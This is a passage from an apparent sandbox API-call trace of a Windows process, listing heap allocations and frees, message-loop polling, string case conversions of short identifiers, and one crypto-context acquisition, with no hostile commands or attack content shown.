cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0204.356] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.357] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.357] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0204.357] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.357] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0204.357] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0204.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0204.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0204.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.357] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0204.358] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.359] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.359] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0204.359] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.359] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0204.359] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.359] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.360] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.360] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.360] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.360] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.360] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0204.360] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.361] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0204.361] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0204.361] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.362] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.362] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0204.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0204.363] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0204.363] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0204.364] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0204.364] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0204.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0204.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0204.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0204.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0204.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0204.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0204.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0204.366] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0204.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.366] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0204.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0204.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0204.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0204.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0204.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 